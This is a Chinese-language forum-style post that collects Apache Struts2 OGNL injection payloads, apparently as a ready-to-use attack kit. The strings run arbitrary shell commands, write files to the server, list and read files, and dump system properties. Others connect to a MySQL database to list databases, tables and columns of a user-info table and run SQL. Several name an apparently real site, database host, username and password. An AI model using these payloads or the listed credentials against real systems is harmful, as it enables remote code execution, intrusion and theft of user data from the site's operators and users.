2010版的,其他的版本,在这个基础上修个。欢迎多爆料。
网站物理路径:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
java.版本:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
os.name:
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
os.arch
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
os.version
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
user.name
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))
user.home
网站物理路径:
java.home: \43req.getRealPath(%22\u005c%22)
java.version: @java.lang.System@getProperty(%22java.version%22)
os.name: @java.lang.System@getProperty(%22os.name%22)
os.arch: @java.lang.System@getProperty(%22os.arch%22)
os.version: @java.lang.System@getProperty(%22os.version%22)
user.name: @java.lang.System@getProperty(%22user.name%22)
user.home: /usr/share/jbossas
user.dir: /var/lib/jbossas/bin
java.class.version: 49.0
java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar
java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 1.5.0_13-b05
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.5
java.specification.vender:
java.specification.name: Java Platform API Specification
java.io.tmpdir: /tmp
执行CMD
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls+-la
http://www.quam.net/index.action?request_locale=zh_TW&
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt
上传文件数据包
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))
POST
t=neirong&path=%2Ftmp%2Fhsmw.txt
修改POST版加&即可。
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))
&t=neirong&path=%2Ftmp%2Fhsmw.txt
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))
&t=neirong&path=/tmp/hsmw.txt
列目录
返回值(true)判断读取 @java.io.File@listRoots()[0].isDirectory()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))
目录数 @java.io.File@listRoots().length
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))
第一个数组 @java.io.File@listRoots()[0])
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('\43xman.getWriter().close()')(d))
数组返回值 @java.io.File@listRoots()[0].listFiles().length
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))
第一个 @java.io.File@listRoots()[0].listFiles()[0].getName()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))
第2个 @java.io.File@listRoots()[0].listFiles()[1].getName()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))
如何判断文件 返回值(false) @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))
判断文件大小 @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length()
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('\43xman.getWriter().close()')(d))
输出文件内容
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22])
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7])
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))
—数据库操作—
rs.absolute(1) 为第1个数据库
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) 为第2个数据库
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
以此类推,访问数值为空,停止。数据库连接格式比较
&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
&psw=密码&user=账号&clazz=数据库类型&url=数据库URL(注意URL编码)
------
数据库(表查询)在原来的语句中,多出一个 &db=数据库名
rs.absolute(1) 为第1个表
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) 为第2个表
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
------
数据库(字段查询)在原来的语句中,多出一个 &table=表
rs.absolute(1)为第1个字段
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(1)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2)为第2个字段
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(2)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
-----
数据库(执行SQL语句)在原来的语句中,多出一个 &sql=select+count%28*%29+from+userinfos
!这里GET 的数据!POST 木有,怪了。
计算查询的字段数 (例子1)
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
计算查询的字段数 (例子2)返回值8,就是8个字段
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
确定8以后,rs.getMetaData().getColumnName(1) 然后 rs.getMetaData().getColumnName(2) 类推8个字段。
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
输出内容 用rs.next(),第一条内容,是rs.next()
